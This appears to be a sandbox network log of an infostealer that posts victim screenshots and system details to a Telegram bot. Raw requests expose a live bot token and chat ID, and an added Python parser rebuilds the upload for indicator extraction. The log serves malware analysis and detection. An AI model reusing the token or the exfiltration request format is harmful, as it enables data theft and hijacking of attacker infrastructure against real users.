                                                                  2024-04-19 17:35:17 UTC16355OUTData Raw: e7 92 7f df 22 9c aa aa 30 a0 01 e8 2b 4a 58 19 c6 a2 94 a4 ac 8c eb 66 b4 1d 19 c2 9c 5d e4 ad ad 85 a2 8a 2b d5 3e 78 28 a2 8a 00 b5 a5 b2 a6 a9 6a cc 42 a8 95 49 24 e0 01 9a ee 3e dd 67 ff 00 3f 70 7f df c5 ff 00 1a f3 da 2b 8e be 17 db 4b 9a f6 3d 0c 2e 3b ea f0 70 e5 be bd cf 42 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a 4f b7 d9 7f cf e5 bf fd fd 5f f1 af 3e a2 b0 fe cf fe f7 e1 ff 00 04 e9 fe d5 fe e7 e3 ff 00 00 ea 7c 4f 75 6d 36 9a 89 0d c4 52 37 9a 0e 11 c1 38 c1 f4 ae 56 8a 2b b3 0f 47 d8 c7 96 f7 38 31 58 8f ac 4d 4a d6 d0 28 a2 8a dc e6 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51
                                                                  Data Ascii: "0+JXf]+>x(jBI$>g?p+K=.;pB}[O_>|Oum6R78V+G81XMJ(((JZ((((((QEJ)hZJ(JZJQE0(ZJQ
                                                                  2024-04-19 17:35:17 UTC16355OUTData Raw: d9 f2 82 51 45 14 00 57 49 e0 bf f9 06 dd 7f d7 d3 ff 00 25 ae 6e ba 4f 05 ff 00 c8 36 eb fe be 9f f9 2d 79 79 8f d8 f9 9f 41 92 fc 35 7d 17 e6 6f 4b 22 43 13 cb 23 05 44 05 98 9e c0 57 19 a1 eb 31 5a de de 5e cc 9f ba bb 72 ec 63 52 4c 58 27 01 bb 73 9a d6 d5 34 7b ed 57 50 29 3c 81 6c 43 02 30 e7 ee 80 32 02 fa 93 9e 4e 6b 71 21 8a 38 04 09 1a 88 82 ed 09 8e 31 e9 5e 3b 52 9c ae b4 b1 f4 d0 9d 2a 14 9c 5f bc e5 bd ba 2f f3 ff 00 22 b5 96 a7 6d 7b 2b c3 19 75 95 14 31 49 10 a9 c1 e8 7d c5 73 3e 2a ff 00 91 8a 3f fa f5 1f fa 19 ae ae da c6 d2 d1 99 ad ad a2 85 9b ef 14 40 33 5c a7 8a bf e4 62 8f fe bd 47 fe 86 6b a2 85 fd a4 2f dc e1 c4 f2 7b 1a bc 9b 72 bd fe 46 65 14 51 5f 48 7c 38 51 45 14 00 51 45 14 0c 28 a2 8a 00 28 a2 8a 00 4a 29 68 a0 04 a2 96 8a
2024-04-19 17:35:17 UTC | 50 | OUT | Data Ascii: -----------------------------8dc6a4172022d82--
2024-04-19 17:35:17 UTC | 25 | IN | HTTP/1.1 100 Continue
2024-04-19 17:35:18 UTC | 1482 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 19 Apr 2024 17:35:18 GMT
Content-Type: application/json
Content-Length: 1093
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  {"ok":true,"result":{"message_id":3440,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548118,"document":{"file_name":"user-618321 2024-05-02 00-47-29.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAg1wZiKrVpTf3MTQCGBG8QSTup8w-SkAArMXAAKLUhlRLkVZjOqtbpsBAAdtAAM0BA","file_unique_id":"AQADsxcAAotSGVFy","file_size":12511,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAg1wZiKrVpTf3MTQCGBG8QSTup8w-SkAArMXAAKLUhlRLkVZjOqtbpsBAAdtAAM0BA","file_unique_id":"AQADsxcAAotSGVFy","file_size":12511,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAINcGYiq1aU39zE0AhgRvEEk7qfMPkpAAKzFwACi1IZUS5FWYzqrW6bNAQ","file_unique_id":"AgADsxcAAotSGVE","file_size":66532},"caption":"New SC Recovered!\n\nTime: 05/02/2024 00:42:29\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49724 | 149.154.167.220 | 443 | 3472 | C:\Users\user\Desktop\z1E-catalogSamples.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 17:35:28 UTC | 262 | OUT | POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------8dc78741e30d00b
Host: api.telegram.org
Content-Length: 72005
Expect: 100-continue
Connection: Keep-Alive
2024-04-19 17:35:28 UTC | 1024 | OUT | Data Ascii:
-----------------------------8dc78741e30d00b
Content-Disposition: form-data; name="chat_id"

1210558492
-----------------------------8dc78741e30d00b
Content-Disposition: form-data; name="caption"

New SC Recovered!

Time: 05/20/2024 02:25:23
User
2024-04-19 17:35:28 UTC | 50 | OUT | Data Ascii: -----------------------------8dc78741e30d00b--
2024-04-19 17:35:28 UTC | 25 | IN | HTTP/1.1 100 Continue
2024-04-19 17:35:29 UTC | 1482 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 19 Apr 2024 17:35:29 GMT
Content-Type: application/json
Content-Length: 1093
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  {"ok":true,"result":{"message_id":3441,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548129,"document":{"file_name":"user-618321 2024-05-20 02-25-29.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAg1xZiKrYbZPGJtzfjh9hYIR6GHXiUAAArQXAAKLUhlRs_qaKwfDiiMBAAdtAAM0BA","file_unique_id":"AQADtBcAAotSGVFy","file_size":13289,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAg1xZiKrYbZPGJtzfjh9hYIR6GHXiUAAArQXAAKLUhlRs_qaKwfDiiMBAAdtAAM0BA","file_unique_id":"AQADtBcAAotSGVFy","file_size":13289,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAINcWYiq2G2Txibc344fYWCEehh14lAAAK0FwACi1IZUbP6misHw4ojNAQ","file_unique_id":"AgADtBcAAotSGVE","file_size":71382},"caption":"New SC Recovered!\n\nTime: 05/20/2024 02:25:23\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49725 | 149.154.167.220 | 443 | 7324 | C:\Users\user\AppData\Roaming\vZkoWbol.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 17:35:36 UTC | 238 | OUT | POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------8dc6ed5c7b45081
Host: api.telegram.org
Content-Length: 67155
Expect: 100-continue
2024-04-19 17:35:36 UTC | 1024 | OUT | Data Ascii:
-----------------------------8dc6ed5c7b45081
Content-Disposition: form-data; name="chat_id"

1210558492
-----------------------------8dc6ed5c7b45081
Content-Disposition: form-data; name="caption"

New SC Recovered!

Time: 05/07/2024 20:34:21
User
2024-04-19 17:35:36 UTC | 50 | OUT | Data Ascii: -----------------------------8dc6ed5c7b45081--
2024-04-19 17:35:36 UTC | 25 | IN | HTTP/1.1 100 Continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 49726 | 149.154.167.220 | 443 | 7324 | C:\Users\user\AppData\Roaming\vZkoWbol.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 17:35:38 UTC | 262 | OUT | POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------8dc70f0a363c025
Host: api.telegram.org
Content-Length: 67155
Expect: 100-continue
Connection: Keep-Alive
2024-04-19 17:35:39 UTC | 1024 | OUT | Data Ascii:
-----------------------------8dc70f0a363c025
Content-Disposition: form-data; name="chat_id"

1210558492
-----------------------------8dc70f0a363c025
Content-Disposition: form-data; name="caption"

New SC Recovered!

Time: 05/10/2024 12:56:39
User
2024-04-19 17:35:39 UTC | 50 | OUT | Data Ascii: -----------------------------8dc70f0a363c025--
2024-04-19 17:35:39 UTC | 25 | IN | HTTP/1.1 100 Continue
2024-04-19 17:35:39 UTC | 1482 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 19 Apr 2024 17:35:39 GMT
Content-Type: application/json
Content-Length: 1093
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  {"ok":true,"result":{"message_id":3443,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548139,"document":{"file_name":"user-618321 2024-05-10 12-56-41.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAg1zZiKra6IhtTON8KcRAfHI_IdZiVcAArcXAAKLUhlRAt6wRxZCEaIBAAdtAAM0BA","file_unique_id":"AQADtxcAAotSGVFy","file_size":12511,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAg1zZiKra6IhtTON8KcRAfHI_IdZiVcAArcXAAKLUhlRAt6wRxZCEaIBAAdtAAM0BA","file_unique_id":"AQADtxcAAotSGVFy","file_size":12511,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAINc2Yiq2uiIbUzjfCnEQHxyPyHWYlXAAK3FwACi1IZUQLesEcWQhGiNAQ","file_unique_id":"AgADtxcAAotSGVE","file_size":66532},"caption":"New SC Recovered!\n\nTime: 05/10/2024 12:56:39\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 49727 | 149.154.167.220 | 443 | 7324 | C:\Users\user\AppData\Roaming\vZkoWbol.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 17:35:39 UTC | 262 | OUT | POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------8dc72be64e6da25
Host: api.telegram.org
Content-Length: 67155
Expect: 100-continue
Connection: Keep-Alive
                                                                  2024-04-19 17:35:39 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 32 62 65 36 34 65 36 64 61 32 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 31 30 35 35 38 34 39 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 32 62 65 36 34 65 36 64 61 32 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 35 2f 31 32 2f 32 30 32 34 20 31 39 3a 35 32 3a 30 34 0a 55 73 65 72
                                                                  Data Ascii: -----------------------------8dc72be64e6da25Content-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc72be64e6da25Content-Disposition: form-data; name="caption"New SC Recovered!Time: 05/12/2024 19:52:04User
                                                                  2024-04-19 17:35:39 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                                  Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"|
                                                                  2024-04-19 17:35:39 UTC16355OUTData Raw: e7 92 7f df 22 9c aa aa 30 a0 01 e8 2b 4a 58 19 c6 a2 94 a4 ac 8c eb 66 b4 1d 19 c2 9c 5d e4 ad ad 85 a2 8a 2b d5 3e 78 28 a2 8a 00 b5 a5 b2 a6 a9 6a cc 42 a8 95 49 24 e0 01 9a ee 3e dd 67 ff 00 3f 70 7f df c5 ff 00 1a f3 da 2b 8e be 17 db 4b 9a f6 3d 0c 2e 3b ea f0 70 e5 be bd cf 42 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a 4f b7 d9 7f cf e5 bf fd fd 5f f1 af 3e a2 b0 fe cf fe f7 e1 ff 00 04 e9 fe d5 fe e7 e3 ff 00 00 ea 7c 4f 75 6d 36 9a 89 0d c4 52 37 9a 0e 11 c1 38 c1 f4 ae 56 8a 2b b3 0f 47 d8 c7 96 f7 38 31 58 8f ac 4d 4a d6 d0 28 a2 8a dc e6 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51
                                                                  Data Ascii: "0+JXf]+>x(jBI$>g?p+K=.;pB}[O_>|Oum6R78V+G81XMJ(((JZ((((((QEJ)hZJ(JZJQE0(ZJQ
                                                                  2024-04-19 17:35:39 UTC16355OUTData Raw: d9 f2 82 51 45 14 00 57 49 e0 bf f9 06 dd 7f d7 d3 ff 00 25 ae 6e ba 4f 05 ff 00 c8 36 eb fe be 9f f9 2d 79 79 8f d8 f9 9f 41 92 fc 35 7d 17 e6 6f 4b 22 43 13 cb 23 05 44 05 98 9e c0 57 19 a1 eb 31 5a de de 5e cc 9f ba bb 72 ec 63 52 4c 58 27 01 bb 73 9a d6 d5 34 7b ed 57 50 29 3c 81 6c 43 02 30 e7 ee 80 32 02 fa 93 9e 4e 6b 71 21 8a 38 04 09 1a 88 82 ed 09 8e 31 e9 5e 3b 52 9c ae b4 b1 f4 d0 9d 2a 14 9c 5f bc e5 bd ba 2f f3 ff 00 22 b5 96 a7 6d 7b 2b c3 19 75 95 14 31 49 10 a9 c1 e8 7d c5 73 3e 2a ff 00 91 8a 3f fa f5 1f fa 19 ae ae da c6 d2 d1 99 ad ad a2 85 9b ef 14 40 33 5c a7 8a bf e4 62 8f fe bd 47 fe 86 6b a2 85 fd a4 2f dc e1 c4 f2 7b 1a bc 9b 72 bd fe 46 65 14 51 5f 48 7c 38 51 45 14 00 51 45 14 0c 28 a2 8a 00 28 a2 8a 00 4a 29 68 a0 04 a2 96 8a
                                                                  Data Ascii: QEWI%nO6-yyA5}oK"C#DW1Z^rcRLX's4{WP)<lC02Nkq!81^;R*_/"m{+u1I}s>*?@3\bGk/{rFeQ_H|8QEQE((J)h
                                                                  2024-04-19 17:35:39 UTC15447OUTData Raw: a2 8a 29 80 51 45 14 00 51 45 14 00 94 51 45 03 0a 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 25 14 51 40 05 14 51 40 c2 90 d2 f6 a4 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 02 51 4b 49 40 c2 8a 28 a0 02 92 8a 29 8c 28 a2 8a 00 4a 28 cd 26 68 18 b4 94 94 50 16 0c fb 52 66 8a 28 18 52 52 d2 50 01 49 4b 49 40 c2 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 a2 8a 06 21 a2 8a 28 00 a4 a5 a4 a0 61 49 4b 49 40 05 25 2d 14 14 25 14 52 50 08 5a 4a 28 a0 04 34 51 45 03 0a 4a 5a 4a 06 14 94 51 40 09 45 2d 25 03 0a 4a 5a 4a 06 14 94 51 40 05 25 2d 14 0c 4a 28 a2 81 85 25 14 94 00 b4 94 51 40 c3 8a 29 28 a0 02 8a 28 a0 62 51 45 14 0c 4a 28 a2 80 0a 28 a4 a6 30 fe 74 51 f9 50 69 0c 43 c7 34 51 45 30 13 f1 a3 8a 28 a0 61 49 c5 2d 27 14 80 3d e8 fa 51 45
                                                                  Data Ascii: )QEQEQEJZJ(QE%Q@Q@((RRPEPQKI@()(J(&hPRf(RRPIKI@(aIERRP0((!(aIKI@%-%RPZJ(4QEJZJQ@E-%JZJQ@%-J(%Q@)((bQEJ((0tQPiC4QE0(aI-'=QE
                                                                  2024-04-19 17:35:39 UTC1569OUTData Raw: 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 09 ff 00 e3 de 4f f7 4f f2 af 9e 6b e8 39 a6 88 c1 20 12 21 25 4f f1 0f 4a f9 f2 ae 26 73 0a dc d3 3c 49 3d 9d 8f d8 2e 6d 60 bf b3 ce e5 86 e1 72 14 fa 83 db f0 ac 3a 2a 88 37 35 3f 12 4f 79 63 f6 0b 6b 58 2c 2c f3 b9 a1 b7 5c 06 3e a4 f7 fc 6b 0e 8a 28 00 a2 8a 29 80 56 bd cf 89 f5 cb 8b a9 67 fe d5 bc 8b cc 72 fe 5c 57
                                                                  Data Ascii: }<B$}<B$}<B$}<B$}<B$}<B$}<BOOk9 !%OJ&s<I=.m`r:*75?OyckX,,\>k()Vgr\W
                                                                  2024-04-19 17:35:39 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 32 62 65 36 34 65 36 64 61 32 35 2d 2d 0d 0a
                                                                  Data Ascii: -----------------------------8dc72be64e6da25--
                                                                  2024-04-19 17:35:39 UTC25INHTTP/1.1 100 Continue
                                                                  2024-04-19 17:35:40 UTC1482INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 19 Apr 2024 17:35:40 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 1093
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  {"ok":true,"result":{"message_id":3444,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548140,"document":{"file_name":"user-618321 2024-05-12 20-02-04.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAg10ZiKrbLkZr1HG6qxkcKQBEuD0NPIAArgXAAKLUhlRcZjLs1Wa--YBAAdtAAM0BA","file_unique_id":"AQADuBcAAotSGVFy","file_size":12511,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAg10ZiKrbLkZr1HG6qxkcKQBEuD0NPIAArgXAAKLUhlRcZjLs1Wa--YBAAdtAAM0BA","file_unique_id":"AQADuBcAAotSGVFy","file_size":12511,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAINdGYiq2y5Ga9RxuqsZHCkARLg9DTyAAK4FwACi1IZUXGYy7NVmvvmNAQ","file_unique_id":"AgADuBcAAotSGVE","file_size":66532},"caption":"New SC Recovered!\n\nTime: 05/12/2024 19:52:04\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}
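The sessions above all carry the same exchange: a multipart POST to `/bot<id>:<token>/sendDocument` with a `chat_id` part, a `caption` part holding the victim fingerprint, and the screenshot as the document, answered by a JSON `result` that echoes the operator's chat and the stored file. The parser below is an added example, not code from the Joe Sandbox report or from the malware. The request line, headers and the `chat_id`/`caption` parts are copied from session 13; the `document` part header and the JPEG bytes are not visible in the capture, so they are constructed here (the field name `document` is the Bot API parameter for sendDocument, the filename is the one the reply echoes), and the reply is the captured JSON with its thumbnail objects dropped.

```python
# Added example, not code from the report or from the malware. Request line,
# headers and chat_id/caption parts are copied from session 13; the "document"
# part header and the JPEG bytes are not in the capture and are constructed.
import json
import re

BOUNDARY = "---------------------------8dc72be64e6da25"
CAPTION = ("New SC Recovered!\n\nTime: 05/10/2024 12:56:39\nUser Name: user/618321\n"
           "OSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n"
           "RAM: 8191.25 MB\nIP Address: 81.181.57.52")
FAKE_JPEG = b"\xff\xd8\xff\xe0" + bytes(60) + b"\xff\xd9"  # constructed stand-in for the screenshot

_BODY = (
    f'\r\n--{BOUNDARY}\r\nContent-Disposition: form-data; name="chat_id"\r\n\r\n1210558492'
    f'\r\n--{BOUNDARY}\r\nContent-Disposition: form-data; name="caption"\r\n\r\n{CAPTION}'
    f'\r\n--{BOUNDARY}\r\nContent-Disposition: form-data; name="document"; '
    'filename="user-618321 2024-05-10 12-56-41.jpg"\r\nContent-Type: image/jpeg\r\n\r\n'
).encode() + FAKE_JPEG + f"\r\n--{BOUNDARY}--\r\n".encode()
SAMPLE_REQUEST = (
    "POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1\r\n"
    f"Content-Type: multipart/form-data; boundary={BOUNDARY}\r\nHost: api.telegram.org\r\n"
    f"Content-Length: {len(_BODY)}\r\nExpect: 100-continue\r\nConnection: Keep-Alive\r\n\r\n"
).encode() + _BODY
# Reply from the capture, thumbnail objects dropped for brevity.
SAMPLE_RESPONSE = (
    '{"ok":true,"result":{"message_id":3443,"from":{"id":7177134832,"is_bot":true,'
    '"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,'
    '"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548139,'
    '"document":{"file_name":"user-618321 2024-05-10 12-56-41.jpg","mime_type":"image/jpeg",'
    '"file_size":66532},"caption":"New SC Recovered!\\n\\nTime: 05/10/2024 12:56:39\\nUser Name: '
    'user/618321\\nOSFullName: Microsoft Windows 10 Pro\\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz'
    '\\nRAM: 8191.25 MB\\nIP Address: 81.181.57.52"}}'
)

REQUEST_LINE_RE = re.compile(r"^POST /bot(\d+):([A-Za-z0-9_-]+)/(\w+) HTTP/1\.[01]$")
BOUNDARY_RE = re.compile(r"boundary=([^;\s]+)")
DISPOSITION_RE = re.compile(r'(\w+)="([^"]*)"')
CAPTION_LINE_RE = re.compile(r"^([A-Za-z ]+): (.+)$", re.M)


def _headers(block: bytes) -> dict:
    # 'Name: value' lines -> lower-cased dict; the first colon splits name from value
    out = {}
    for line in block.decode("latin-1").split("\r\n"):
        name, _, value = line.partition(":")
        if value:
            out[name.strip().lower()] = value.strip()
    return out

def split_multipart(body: bytes, boundary: str) -> list:
    """Split a multipart/form-data body into (part headers, part data) tuples."""
    parts = []
    for chunk in body.split(b"--" + boundary.encode())[1:]:
        if chunk.startswith(b"--"):        # "--boundary--" closes the body
            break
        head, _, data = chunk.removeprefix(b"\r\n").partition(b"\r\n\r\n")
        parts.append((_headers(head), data.removesuffix(b"\r\n")))
    return parts

def parse_request(raw: bytes) -> dict:
    """Extract bot id/token, API method, text fields and uploads from the POST."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, _, header_block = head.partition(b"\r\n")
    m = REQUEST_LINE_RE.match(request_line.decode("latin-1"))
    if not m: raise ValueError("not a Telegram Bot API request")
    bm = BOUNDARY_RE.search(_headers(header_block).get("content-type", ""))
    if not bm: raise ValueError("no multipart boundary in Content-Type")
    form, files = {}, []
    for part_headers, data in split_multipart(body, bm.group(1)):
        params = dict(DISPOSITION_RE.findall(part_headers.get("content-disposition", "")))
        if "filename" in params:           # file part: keep name, filename and size only
            files.append((params.get("name", ""), params["filename"], len(data)))
        else:                              # text part: chat_id, caption
            form[params.get("name", "")] = data.decode("utf-8", "replace")
    return {"bot_id": m[1], "token": m[2], "method": m[3], "form": form, "files": files}

def victim_fields(caption: str) -> dict:
    # 'Key: value' lines of the AgentTesla caption -> dict (the headline has no colon)
    return dict(CAPTION_LINE_RE.findall(caption))

def parse_response(raw: str) -> dict:
    """Operator chat, bot account and upload details from the Bot API JSON reply."""
    obj = json.loads(raw)
    if not obj.get("ok"): raise ValueError("Bot API call failed")
    result, chat = obj["result"], obj["result"]["chat"]
    return {
        "bot_username": result["from"].get("username"),
        "operator_chat_id": chat["id"],
        "operator_name": " ".join(n for n in (chat.get("first_name"), chat.get("last_name")) if n),
        "file_size": result.get("document", {}).get("file_size"),
        "victim": victim_fields(result.get("caption", "")),
    }

def ioc_record(raw_request: bytes, raw_response: str) -> dict:
    """One record per exchange; the chat_id the implant posted must match the reply."""
    req, resp = parse_request(raw_request), parse_response(raw_response)
    return {**resp, "bot_id": req["bot_id"], "bot_token": req["token"],
            "uploaded_files": req["files"],
            "chat_id_consistent": req["form"].get("chat_id") == str(resp["operator_chat_id"])}
```

`ioc_record(SAMPLE_REQUEST, SAMPLE_RESPONSE)` yields the bot id and token, the operator's chat id and display name, the victim fields from the caption, and the uploaded filename and size in one record. The same parser runs unchanged over sessions 14 to 16, which differ only in boundary, timestamps and screenshot filename.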


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 49728 | 149.154.167.220 | 443 | 3472 | C:\Users\user\Desktop\z1E-catalogSamples.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-19 17:35:55 UTC | 262 | OUT | POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------8dc801ba947090d
    Host: api.telegram.org
    Content-Length: 67155
    Expect: 100-continue
    Connection: Keep-Alive
